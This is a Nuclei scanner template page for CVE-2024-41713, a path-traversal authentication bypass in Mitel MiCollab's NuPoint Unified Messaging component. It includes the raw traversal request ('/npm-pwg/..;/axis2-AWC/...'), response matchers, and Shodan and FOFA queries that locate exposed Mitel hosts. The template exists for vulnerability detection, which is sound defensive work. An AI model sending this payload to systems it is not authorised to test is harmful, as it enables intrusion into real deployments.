Skip to content
Nuclei Templates

Mitel MiCollab - Authentication Bypass

ID: CVE-2024-41713

Severity: high

Author: DhiyaneshDK,watchTowr

Tags: cve,cve204,mitel,cmg-suite,auth-bypass

Description

Section titled “Description”

A vulnerability in the NuPoint Unified Messaging (NPM) component of Mitel MiCollab through 9.8 SP1 FP2 (9.8.1.201) could allow an unauthenticated attacker to conduct a path traversal attack, due to insufficient input validation. A successful exploit could allow unauthorized access, enabling the attacker to view, corrupt, or delete users’ data and system configurations.

YAML Source

Section titled “YAML Source”
id: CVE-2024-41713


info:
  name: Mitel MiCollab - Authentication Bypass
  author: DhiyaneshDK,watchTowr
  severity: high
  description: |
    A vulnerability in the NuPoint Unified Messaging (NPM) component of Mitel MiCollab through 9.8 SP1 FP2 (9.8.1.201) could allow an unauthenticated attacker to conduct a path traversal attack, due to insufficient input validation. A successful exploit could allow unauthorized access, enabling the attacker to view, corrupt, or delete users' data and system configurations.
  reference:
    - https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-misa-2024-0029
    - https://labs.watchtowr.com/where-theres-smoke-theres-fire-mitel-micollab-cve-2024-35286-cve-2024-41713-and-an-0day/?123
    - https://nvd.nist.gov/vuln/detail/CVE-2024-41713
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-41713
    cwe-id: CWE-22
    epss-score: 0.00044
    epss-percentile: 0.12006
  metadata:
    verified: true
    max-request: 1
    vendor: mitel
    product: cmg_suite
    shodan-query: http.html:"Mitel Networks"
    fofa-query: body="mitel networks"
  tags: cve,cve204,mitel,cmg-suite,auth-bypass


http:
  - raw:
      - |
        GET /npm-pwg/..;/axis2-AWC/services/listServices HTTP/1.1
        Host: {{Hostname}}


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Available services"
          - "Service Description"
        condition: and


      - type: status
        status:
          - 200
# digest: 490a00463044022071c2e0cacae9ddccb1def297ab46e88b91dc5ff1f5f3d05c8f2181e5070d23e2022062a66764361eca00011f8568ae9df5c05a3e47bcc30221e27fc52dff54ad76b3:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-41713.yaml"

View on Github